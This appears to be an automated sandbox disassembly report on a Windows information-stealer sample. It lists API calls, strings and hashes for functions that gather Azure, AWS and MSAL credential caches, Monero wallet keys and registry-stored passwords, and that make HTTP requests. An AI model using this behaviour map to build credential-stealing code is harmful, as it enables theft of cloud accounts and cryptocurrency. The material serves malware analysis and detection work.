Part of subcall function 00EE4490: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4516
Part of subcall function 00EE4490: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4526

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE45F5
StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE461A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE479A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EFE7B2,00000000,?,?,00000000,?,",00000000,?,0132D7A8), ref: 00EE4AC8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EE4AE4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EE4AF8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EE4B29
InternetCloseHandle.WININET(00000000), ref: 00EE4B8D
InternetCloseHandle.WININET(00000000), ref: 00EE4BA5
HttpOpenRequestA.WININET(00000000,0132D6C8,?,013315E8,00000000,00000000,00400100,00000000), ref: 00EE47F5

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

InternetCloseHandle.WININET(00000000), ref: 00EE4BAF

Strings

|?, xrefs: 00EE45BC, 00EE4C4F, 00EE464E, 00EE4657, 00EE46C5, 00EE473C, 00EE4830, 00EE4971, 00EE46C8, 00EE473F, 00EE4833, 00EE4974
", xrefs: 00EE48D2
------, xrefs: 00EE4808
------, xrefs: 00EE4949
", xrefs: 00EE4A13
|?, xrefs: 00EE4570, 00EE4C62, 00EE4573
------, xrefs: 00EE469D

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$|?$|?
API String ID: 460715078-4101575886
Opcode ID: ded2ba139a7162842f66d47c77ca74e488b41e2fc58f465a431b18edb15d607b
Instruction ID: 28e9498e678a095dc0acb446680d96a168e00ef59a8adb17033d97801ca28aec
Opcode Fuzzy Hash: ded2ba139a7162842f66d47c77ca74e488b41e2fc58f465a431b18edb15d607b
Instruction Fuzzy Hash: 1812AA7291111CAACF19EF50DE92FEEB3B9AF15300F5051A9B206B2491EF706B48CF65

Function 00EEC670 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF6A70: GetSystemTime.KERNEL32(?,01324BF8,00EFE129,?,?,?,?,?,?,?,?,?,00EE4643,?,00000014), ref: 00EF6A96

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EEC703
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EEC847
RtlAllocateHeap.NTDLL(00000000), ref: 00EEC84E
lstrcat.KERNEL32(?,00000000), ref: 00EEC988
lstrcat.KERNEL32(?,00EFECC8), ref: 00EEC997
lstrcat.KERNEL32(?,00000000), ref: 00EEC9AA
lstrcat.KERNEL32(?,00EFECCC), ref: 00EEC9B9
lstrcat.KERNEL32(?,00000000), ref: 00EEC9CC
lstrcat.KERNEL32(?,00EFECD0), ref: 00EEC9DB
lstrcat.KERNEL32(?,00000000), ref: 00EEC9EE
lstrcat.KERNEL32(?,00EFECD4), ref: 00EEC9FD
lstrcat.KERNEL32(?,00000000), ref: 00EECA10
lstrcat.KERNEL32(?,00EFECD8), ref: 00EECA1F
lstrcat.KERNEL32(?,00000000), ref: 00EECA32
lstrcat.KERNEL32(?,00EFECDC), ref: 00EECA41
lstrcat.KERNEL32(?,00000000), ref: 00EECA54
lstrcat.KERNEL32(?,00EFECE0), ref: 00EECA63

Part of subcall function 00EF8640: lstrlen.KERNEL32(00000000,?,?,00EF3D93,00EFE4BB,00EFE4BA,?,?,00EF4A46,00000000,?,013214B8,?,00EFE988,?,00000000), ref: 00EF864B
Part of subcall function 00EF8640: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF86A5

lstrlen.KERNEL32(?), ref: 00EECAAA
lstrlen.KERNEL32(?), ref: 00EECAB9
memset.MSVCRT ref: 00EECB02

Part of subcall function 00EF8890: StrCmpCA.SHLWAPI(00000000,00EFECC0,00EEC922,00EFECC0,00000000), ref: 00EF88AF

DeleteFileA.KERNEL32(00000000), ref: 00EECB2E

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: fab19125ae73f99f2275076fe49a6834901e38eb9b7607f03207d940485418e2
Instruction ID: 09538115abe5c84eaa4890279e7b6720a0d2170116e6835b91865a7cc4be6fe9
Opcode Fuzzy Hash: fab19125ae73f99f2275076fe49a6834901e38eb9b7607f03207d940485418e2
Instruction Fuzzy Hash: 59E14D7190011CABCF19EBA0DE96EFEB3B9AF14301F505068F206B6195EF706E48CB61

Function 00EF3970 Relevance: 30.1, APIs: 10, Strings: 10, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00EF3987

Part of subcall function 00EF6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

lstrcat.KERNEL32(?,00000000), ref: 00EF39B0
lstrcat.KERNEL32(?,\.azure\), ref: 00EF39CD

Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF3579
Part of subcall function 00EF3560: FindFirstFileA.KERNEL32(?,?), ref: 00EF3590

memset.MSVCRT ref: 00EF3A0D
lstrcat.KERNEL32(?,00000000), ref: 00EF3A36
lstrcat.KERNEL32(?,\.aws\), ref: 00EF3A53

Part of subcall function 00EF3560: StrCmpCA.SHLWAPI(?,00EFE8C4), ref: 00EF35BE
Part of subcall function 00EF3560: StrCmpCA.SHLWAPI(?,00EFE8C8), ref: 00EF35D4
Part of subcall function 00EF3560: FindNextFileA.KERNEL32(000000FF,?), ref: 00EF37A9
Part of subcall function 00EF3560: FindClose.KERNEL32(000000FF), ref: 00EF37BE

memset.MSVCRT ref: 00EF3A93
lstrcat.KERNEL32(?,00000000), ref: 00EF3ABC
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EF3AD9

Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF35FA
Part of subcall function 00EF3560: StrCmpCA.SHLWAPI(?,00EFE497), ref: 00EF360C
Part of subcall function 00EF3560: wsprintfA.USER32 ref: 00EF3629
Part of subcall function 00EF3560: PathMatchSpecA.SHLWAPI(?,?), ref: 00EF365F
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,0132D748), ref: 00EF368B
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,00EFE8E0), ref: 00EF369D
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,?), ref: 00EF36AE
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,00EFE8E4), ref: 00EF36C0
Part of subcall function 00EF3560: lstrcat.KERNEL32(?,?), ref: 00EF36D4
Part of subcall function 00EF3560: CopyFileA.KERNEL32(?,?,00000001), ref: 00EF36EA
Part of subcall function 00EF3560: DeleteFileA.KERNEL32(?), ref: 00EF3769

memset.MSVCRT ref: 00EF3B19

Strings

Azure\.azure, xrefs: 00EF39D3
msal.cache, xrefs: 00EF3AE4
Azure\.IdentityService, xrefs: 00EF3ADF
vB, xrefs: 00EF39EE, 00EF3A74, 00EF3AFA, 00EF3B22, 00EF39F1, 00EF3A77, 00EF3AFD
*.*, xrefs: 00EF3A5E
\.IdentityService\, xrefs: 00EF3ACD
Azure\.aws, xrefs: 00EF3A59
\.azure\, xrefs: 00EF39C1
\.aws\, xrefs: 00EF3A47
*.*, xrefs: 00EF39D8

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$vB
API String ID: 4017274736-96066464
Opcode ID: 89ccc8acfdab5cddc88e3212d259bd91593297d8d4718238c029fe07d39201df
Instruction ID: 6db6432d0e8282110d671e55bd7bd5e8de670f615d15b3be7a0f1f85b475f1ea
Opcode Fuzzy Hash: 89ccc8acfdab5cddc88e3212d259bd91593297d8d4718238c029fe07d39201df
Instruction Fuzzy Hash: 9B4181B5A4031C6BCB14EBA0DD4BEED76789B54704F0054A4B74AB6181EEF0A798CBA1

Function 00EF61F0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

RegOpenKeyExA.KERNEL32(00000000,0132DB68,00000000,00020019,00000000,00EFE146), ref: 00EF6274
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EF62F6
wsprintfA.USER32 ref: 00EF6329
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00EF634B
RegCloseKey.ADVAPI32(00000000), ref: 00EF635C
RegCloseKey.ADVAPI32(00000000), ref: 00EF6369

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Strings

%s\%s, xrefs: 00EF631D
?, xrefs: 00EF624A
- , xrefs: 00EF6473

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 4ae7397754e1d78d2e7b8bdb2d0864925b9aaef43f03f9ff72bb71a8ca33fbc8
Instruction ID: 8647b7e8a27a8d68d1b900557dc9dec0f245dd7a0fab72fad5578a4cea92b240
Opcode Fuzzy Hash: 4ae7397754e1d78d2e7b8bdb2d0864925b9aaef43f03f9ff72bb71a8ca33fbc8
Instruction Fuzzy Hash: 1F810A7191011C9BDF68EF54CD95FEAB7B9BF48700F0092D9A209A6180DF746B84CFA0

Function 00EF6F20 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 184COMMON

Download Yara Rule

Strings

B, xrefs: 00EF6F4F, 00EF7113, 00EF6F52, 00EF7116
B, xrefs: 00EF70DE, 00EF7153, 00EF708E, 00EF705F, 00EF7032, 00EF6F8D, 00EF6F64, 00EF70E1
image/jpeg, xrefs: 00EF7046

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg$B$B
API String ID: 0-3759136580
Opcode ID: b6be10a1492da8b1938e89f66f450c1586a4c3c41b1867807401fdfbf18b033d
Instruction ID: 9ad168908f7b6e9d9b4f2f898546c6a55f949d85af01d22ada7a953f17578bc9
Opcode Fuzzy Hash: b6be10a1492da8b1938e89f66f450c1586a4c3c41b1867807401fdfbf18b033d
Instruction Fuzzy Hash: 7B71BE75E10208ABDB18DFE4D889FEEB7B9BF48701F108518F615A7284DB75A944CB60

Function 00EE12D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00EE12E7

Part of subcall function 00EE1260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00EE1274
Part of subcall function 00EE1260: HeapAlloc.KERNEL32(00000000), ref: 00EE127B
Part of subcall function 00EE1260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00EE1297
Part of subcall function 00EE1260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 00EE12B5
Part of subcall function 00EE1260: RegCloseKey.ADVAPI32(?), ref: 00EE12BF

lstrcat.KERNEL32(?,00000000), ref: 00EE130F
lstrlen.KERNEL32(?), ref: 00EE131C
lstrcat.KERNEL32(?,.keys), ref: 00EE1337

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF6A70: GetSystemTime.KERNEL32(?,01324BF8,00EFE129,?,?,?,?,?,?,?,?,?,00EE4643,?,00000014), ref: 00EF6A96

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EE1425

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE93EC
Part of subcall function 00EE93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9411
Part of subcall function 00EE93C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9431
Part of subcall function 00EE93C0: ReadFile.KERNEL32(000000FF,?,00000000,00EEF9B7,00000000), ref: 00EE945A
Part of subcall function 00EE93C0: LocalFree.KERNEL32(00EEF9B7), ref: 00EE9490
Part of subcall function 00EE93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EE949A

DeleteFileA.KERNEL32(00000000), ref: 00EE14A9
memset.MSVCRT ref: 00EE14D0

Part of subcall function 00EE4DE0: lstrlen.KERNEL32(00000000), ref: 00EE4E6A
Part of subcall function 00EE4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4EDB
Part of subcall function 00EE4DE0: StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE4EF9

Strings

wallet_path, xrefs: 00EE12F0
.keys, xrefs: 00EE132B
\Monero\wallet.keys, xrefs: 00EE134D
SOFTWARE\monero-project\monero-core, xrefs: 00EE12F5

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: ea63544c191ff1e9706d5abdcaf93984ec6f28a065f8a90706f9f0218c8a5887
Instruction ID: f9fb81519b09e2bce4d1e635940c7dc7630e128eac3e000fac6f86bfb7b81dc5
Opcode Fuzzy Hash: ea63544c191ff1e9706d5abdcaf93984ec6f28a065f8a90706f9f0218c8a5887
Instruction Fuzzy Hash: 21510CB195011D9BCF29FB60DD96AED73BC9F54300F4051E8B30AB2082EE706B888F65

Function 00EF5000 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00EF500E

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

OpenProcess.KERNEL32(001FFFFF,00000000,=R,00EFE289), ref: 00EF504C
memset.MSVCRT ref: 00EF509A
??_V@YAXPAX@Z.MSVCRT ref: 00EF51EE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00EF50BC
=R, xrefs: 00EF5041, 00EF5044
=R, xrefs: 00EF51DE, 00EF50A9, 00EF50AC

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$=R$=R
API String ID: 224852652-3643292833
Opcode ID: 34fbc68f0ecf58bfd1df2ed6eb08315fdb72a8957cef27a5fd70837cc05d10b1
Instruction ID: 484e4c547dbd243b914f608dd001cb5336644741ad95dc792b9bd4c648e4f009
Opcode Fuzzy Hash: 34fbc68f0ecf58bfd1df2ed6eb08315fdb72a8957cef27a5fd70837cc05d10b1
Instruction Fuzzy Hash: DC516BB1C0061C9BDB24EB90DC85BFEB7B4AF54304F6051A8E319B6291EF746A88CF54

Function 00EF5430 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EF5472
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EF54AF
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF5533
HeapAlloc.KERNEL32(00000000), ref: 00EF553A
wsprintfA.USER32 ref: 00EF5570

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Strings

h?, xrefs: 00EF557D, 00EF5585, 00EF554B, 00EF5553
:, xrefs: 00EF548C
\, xrefs: 00EF5490
C, xrefs: 00EF547C

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$h?
API String ID: 3790021787-1889970419
Opcode ID: d470079dbdc75a165836fc72221f37484a252fe71bba857c11e58a3a0b881fc7
Instruction ID: 3245398a082df0b9c13fd34186240b0247df983c3669d41ed4bda9739fdaa9e3
Opcode Fuzzy Hash: d470079dbdc75a165836fc72221f37484a252fe71bba857c11e58a3a0b881fc7
Instruction Fuzzy Hash: 5B4181B1D0025CABDF10DB94DC45BEEBBB8EF58704F104499F609BB281D774AA84CBA5

Function 00EE6FD0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE6CD0: memset.MSVCRT ref: 00EE6D14
Part of subcall function 00EE6CD0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00EE7690), ref: 00EE6D3A
Part of subcall function 00EE6CD0: RegEnumValueA.ADVAPI32(00EE7690,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EE6DB1
Part of subcall function 00EE6CD0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EE6E0D
Part of subcall function 00EE6CD0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00EE7690,80000001,00EF42AE,?,?,?,?,?,00EE7690,?), ref: 00EE6E52
Part of subcall function 00EE6CD0: HeapFree.KERNEL32(00000000,?,?,?,?,00EE7690,80000001,00EF42AE,?,?,?,?,?,00EE7690,?), ref: 00EE6E59

lstrcat.KERNEL32(2DA1B020,00EFF04C), ref: 00EE7006
lstrcat.KERNEL32(2DA1B020,00000000), ref: 00EE7048
lstrcat.KERNEL32(2DA1B020, : ), ref: 00EE705A
lstrcat.KERNEL32(2DA1B020,00000000), ref: 00EE708F
lstrcat.KERNEL32(2DA1B020,00EFF054), ref: 00EE70A0
lstrcat.KERNEL32(2DA1B020,00000000), ref: 00EE70D3
lstrcat.KERNEL32(2DA1B020,00EFF058), ref: 00EE70ED
task.LIBCPMTD ref: 00EE70FB

Strings

: , xrefs: 00EE704E

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

